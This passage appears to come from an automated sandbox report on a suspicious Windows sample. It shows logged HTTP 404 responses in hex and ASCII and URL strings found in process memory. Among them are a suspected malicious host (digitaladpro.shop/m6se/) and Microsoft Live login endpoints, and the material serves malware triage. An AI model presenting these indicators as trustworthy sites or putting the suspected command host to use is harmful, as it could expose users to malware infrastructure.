                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:56 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:28:59 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:05 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:08 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:11 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 13 Nov 2024 08:29:13 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 13 Nov 2024 08:29:19 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1566X-XSS-Protection: 0X-Frame-Options: SAMEORIGINConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3527019353.000000000576F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.digitaladpro.shop
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3527019353.000000000576F000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.digitaladpro.shop/m6se/
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: AtBroker.exe, 00000003.00000002.3527808936.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: AtBroker.exe, 00000003.00000002.3526286582.0000000005F48000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000004678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/)
                Source: AtBroker.exe, 00000003.00000002.3526286582.0000000005F48000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000004678000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                Source: AtBroker.exe, 00000003.00000002.3526286582.000000000544A000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003B7A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2dQ
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: AtBroker.exe, 00000003.00000003.2009029232.00000000075CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/rexiao.jpeg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/amazeui.min.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/app.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/canvi.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/js/jquery-1.9.1.min.js
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281124251637.jpg
                Source: AtBroker.exe, 00000003.00000002.3527716602.0000000007340000.00000004.00000800.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3526286582.000000000576E000.00000004.10000000.00040000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3525741067.0000000003E9E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202308/28/202308281610030481.jpg
